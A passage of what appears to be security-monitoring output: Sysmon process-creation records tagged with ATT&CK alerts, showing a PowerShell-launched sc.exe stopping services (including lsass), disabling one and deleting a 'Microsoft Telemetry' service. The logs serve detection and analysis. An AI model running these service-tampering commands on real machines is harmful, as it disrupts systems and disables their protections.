DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.296"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-001089653000}"",""processId"":""7864"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.456",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.225 +ProcessGuid: 
{df9fc3d3-b411-5ecf-0000-0010d6623000} +ProcessId: 5604 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.228502600Z"",""eventRecordID"":""3757"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.225\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010d6623000}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.225"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010d6623000}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:21:01.384",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.172 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-00100c603000} +ProcessId: 3816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.175885900Z"",""eventRecordID"":""3754"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.172\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-00100c603000}\r\nProcessId: 3816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager 
Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.172"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-00100c603000}"",""processId"":""3816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.355",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.154 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010fc5e3000} +ProcessId: 3668 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config system Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config system Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.158125200Z"",""eventRecordID"":""3753"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.154\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010fc5e3000}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config system Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.154"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010fc5e3000}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config system Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.283",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.097 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-00103f5d3000} +ProcessId: 7712 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.101085500Z"",""eventRecordID"":""3751"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.097\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-00103f5d3000}\r\nProcessId: 7712\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:33.097"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-00103f5d3000}"",""processId"":""7712"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.228",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:33.048 +ProcessGuid: {df9fc3d3-b411-5ecf-0000-0010e55a3000} +ProcessId: 2492 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:33.053948600Z"",""eventRecordID"":""3748"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:33.048\r\nProcessGuid: {df9fc3d3-b411-5ecf-0000-0010e55a3000}\r\nProcessId: 2492\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:33.048"",""processGuid"":""{df9fc3d3-b411-5ecf-0000-0010e55a3000}"",""processId"":""2492"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:01.193",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:32.928 +ProcessGuid: {df9fc3d3-b410-5ecf-0000-001012593000} +ProcessId: 7360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ""Microsoft 
Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete \""Microsoft Telemetry\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:32.979249200Z"",""eventRecordID"":""3746"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:32.928\r\nProcessGuid: {df9fc3d3-b410-5ecf-0000-001012593000}\r\nProcessId: 7360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete \""Microsoft Telemetry\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:32.928"",""processGuid"":""{df9fc3d3-b410-5ecf-0000-001012593000}"",""processId"":""7360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 